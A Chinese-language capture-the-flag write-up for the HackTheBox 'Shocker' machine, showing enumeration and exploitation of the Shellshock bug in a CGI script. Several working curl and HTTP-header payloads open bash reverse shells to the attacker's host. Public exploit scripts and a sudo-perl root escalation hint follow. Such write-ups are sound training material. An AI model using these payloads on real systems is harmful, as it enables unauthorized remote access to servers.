HTB-靶机-Shocker
生活随笔
收集整理的這篇文章主要介紹了
HTB-靶机-Shocker
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
本篇文章僅用于技術交流學習和研究的目的,嚴禁使用文章中的技術用于非法目的和破壞,否則造成一切后果與發表本文章的作者無關
靶機是作者購買VIP使用退役靶機操作,顯示IP地址為10.10.10.56
本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描
執行命令
autorecon 10.10.10.56 -o ./Shocker-autorecon
得到如下結果:
先訪問80web應用看看
沒看到啥東西,再看看上面掃描結果中的爆破目錄信息
發現一個目錄cgi-bin 嘗試使用wfuzz進行爆破猜測可能存在的后綴
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.10.10.56/cgi-bin/FUZZ.sh
得到一個uri地址/cgi-bin/user.sh 將此文件下載下來
看到此情景判斷可能存在shellshock漏洞,漏洞詳情:https://www.cvedetails.com/cve/CVE-2014-6271/
上面還是可以使用nmap掃描看看,命令如下:
nmap -sV -p 80 --script=http-shellshock.nse --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56
確認上述存在shellshock ,那么就可以開始利用其漏洞拿shell,詳細的利用方式如下:
利用方式:
下面方式都可以正常利用,在user-agent頭也可以
curl -H 'Cookie: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.14.5/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -H 'Cookie: () { :;}; echo; /bin/sh -i >& /dev/tcp/10.10.14.5/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -H 'Cookie: () { :;}; /bin/sh -i >& /dev/tcp/10.10.14.5/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.5/8833 0>&1' http://10.10.10.56/cgi-bin/user.sh
curl -A '() { :; }; /bin/bash -i > /dev/tcp/10.10.14.5/8833 0<&1 2>&1' http://10.10.10.56/cgi-bin/user.sh
上面執行的時候需要本地監聽端口
通過burpsuite提交請求也可以
GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.5/8833 0>&1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
上面執行的時候需要本地監聽端口
直接通過exploit拿shell
https://www.exploit-db.com/exploits/34900
python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.5 lport=9966 pages=/cgi-bin/user.sh
第二種自定義的exploit
https://github.com/nullarmor/hackthebox-exploits/blob/master/shocker/exploit.py
python nullarmor-exploit.py --rhost 10.10.10.56 --lhost 10.10.14.5 --lport 8899
第三種自定義的exploit
https://github.com/nccgroup/shocker
python shocker.py -H 10.10.10.56 --command "/bin/bash -i > /dev/tcp/10.10.14.5/8833 0<&1 2>&1" -c /cgi-bin/user.sh
上面執行的時候需要本地監聽端口
成功反彈shell
這里提權很簡單,每次我都會習慣執行下sudo -l ,這里是發現可以直接通過perl執行sudo權限拿到root權限
迷茫的人生,需要不斷努力,才能看清遠方模糊的志向!
總結
以上是生活随笔為你收集整理的HTB-靶机-Shocker的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Visual C++ 2008 runt
- 下一篇: 用Setup Factory打包Visu